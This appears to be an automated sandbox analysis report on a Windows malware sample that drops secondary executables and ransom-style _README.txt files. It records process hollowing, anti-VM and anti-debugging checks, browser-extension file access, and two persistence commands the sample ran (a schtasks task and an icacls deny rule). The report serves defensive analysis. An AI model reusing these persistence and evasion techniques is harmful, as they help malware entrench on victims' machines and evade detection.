Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 30.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Unpacked PE file: 1.2.sIQywRNC5M.exe.400000.0.unpack
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Unpacked PE file: 5.2.sIQywRNC5M.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Unpacked PE file: 7.2.sIQywRNC5M.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Unpacked PE file: 9.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Unpacked PE file: 13.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 17.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Unpacked PE file: 22.2.sIQywRNC5M.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Unpacked PE file: 25.2.sIQywRNC5M.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 26.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 30.2.mstsca.exe.400000.0.unpack

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 1_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

1_2_00412220

Source: sqln[1].dll.9.dr	Static PE information: section name: .00cfg
Source: mstsca.exe.13.dr	Static PE information: section name: .kic

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_004052A5 push ecx; ret	0_2_004052B8
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_0444C0AF push ecx; retf	0_2_0444C0B2
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DE8F05 push ecx; ret	0_2_05DE8F18
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00428565 push ecx; ret	1_2_00428578
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_0444C0AF push ecx; retf	4_2_0444C0B2
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05DA8F05 push ecx; ret	4_2_05DA8F18
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D050 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D008 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D028 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D090 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D0A8 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D318 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050C4E0 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D550 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00428565 push ecx; ret	5_2_00428578
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050D698 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050C960 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050C928 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050C988 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050C9A8 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CB78 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CD60 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CDF0 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CE58 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CF28 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CFC0 push eax; retn 004Dh	5_2_0050D6B5
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0050CF90 push eax; retn 004Dh	5_2_0050D6B5

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

System file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html

Jump to behavior

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\build2[1].exe	Jump to dropped file

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	File created: C:\Users\user\_README.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 0_2_00404F6E EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00404F6E

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: build2.exe PID: 5748, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: build2.exe, 00000009.00000002.2286401544.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 0_2_0444A71C rdtsc

0_2_0444A71C

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 5_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,

5_2_00481920

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		1_2_0040E670
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,		5_2_0040E670

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 931
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 9068

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqln[1].dll			Jump to dropped file

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_1-45021

Source: C:\Users\user\Desktop\sIQywRNC5M.exe TID: 6388	Thread sleep time: -700000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6476	Thread sleep count: 931 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6476	Thread sleep time: -209475s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6476	Thread sleep count: 9068 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 6476	Thread sleep time: -2040300s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_00410160
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_0040F730
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040FB98
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	5_2_0040F730
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	5_2_00410160
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	5_2_0040FB98

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: sIQywRNC5M.exe, 00000007.00000002.4493673195.0000000000771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx^w
Source: sIQywRNC5M.exe, 00000001.00000002.2047134155.0000000000674000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000001.00000003.2041498848.0000000000674000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWO9W
Source: sIQywRNC5M.exe, 00000001.00000002.2047134155.0000000000657000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: sIQywRNC5M.exe, 00000005.00000003.2120910649.0000000009A62000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: build2.exe, 00000009.00000002.2287398804.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: sIQywRNC5M.exe, 00000005.00000003.2120910649.0000000009A62000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: sIQywRNC5M.exe, 00000001.00000002.2047134155.0000000000674000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000001.00000002.2047134155.0000000000646000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000001.00000003.2041498848.0000000000674000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000005.00000002.2544952320.0000000000833000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000007.00000002.4493673195.0000000000771000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.2287398804.0000000000827000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2162506785.0000000000827000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2142985284.0000000000827000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.2208176977.0000000000827000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000003.2554428371.0000000000753000.00000004.00000020.00020000.00000000.sdmp, sIQywRNC5M.exe, 00000016.00000002.2556136161.0000000000753000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: sIQywRNC5M.exe, 00000001.00000002.2047134155.0000000000657000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-t
Source: build2.exe, 00000009.00000002.2287398804.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: sIQywRNC5M.exe, 00000005.00000002.2544952320.00000000007A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhS
Source: build2.exe, 00000009.00000002.2287398804.00000000007C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarep
Source: sIQywRNC5M.exe, 00000016.00000002.2555939847.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: sIQywRNC5M.exe, 00000007.00000002.4493673195.000000000071C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP^w%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

API call chain: ExitProcess graph end node

graph_1-45023

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 0_2_0444A71C rdtsc

0_2_0444A71C

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 0_2_0040908D IsDebuggerPresent,

0_2_0040908D

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_0042A57A

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

5_2_00481920

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

1_2_00412220

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_044490A3 push dword ptr fs:[00000030h]	0_2_044490A3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_05DC0042 push dword ptr fs:[00000030h]	0_2_05DC0042
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_044490A3 push dword ptr fs:[00000030h]	4_2_044490A3
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 4_2_05D80042 push dword ptr fs:[00000030h]	4_2_05D80042

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 0_2_00408558 GetProcessHeap,

0_2_00408558

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 0_2_00409018 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00409018
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004329EC
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 1_2_004329BB SetUnhandledExceptionFilter,	1_2_004329BB
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_004329EC
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Code function: 5_2_004329BB SetUnhandledExceptionFilter,	5_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 0_2_05DC0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

0_2_05DC0110

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Memory written: C:\Users\user\Desktop\sIQywRNC5M.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Memory written: C:\Users\user\Desktop\sIQywRNC5M.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Memory written: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe	Memory written: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe	Memory written: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Memory written: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe	Memory written: C:\Users\user\AppData\Local\6dd7be7f-99af-46a8-bcf0-92ef41f5c144\sIQywRNC5M.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Section unmapped: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe base address: 400000

Source: C:\Users\user\Desktop\sIQywRNC5M.exe

Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

1_2_00419F90

Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\Desktop\sIQywRNC5M.exe "C:\Users\user\Desktop\sIQywRNC5M.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\Desktop\sIQywRNC5M.exe "C:\Users\user\Desktop\sIQywRNC5M.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\Desktop\sIQywRNC5M.exe "C:\Users\user\Desktop\sIQywRNC5M.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sIQywRNC5M.exe	Process created: C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe "C:\Users\user\AppData\Local\e568af29-970f-4b09-baae-7cf3c3819160\build3.exe"	Jump to behavior
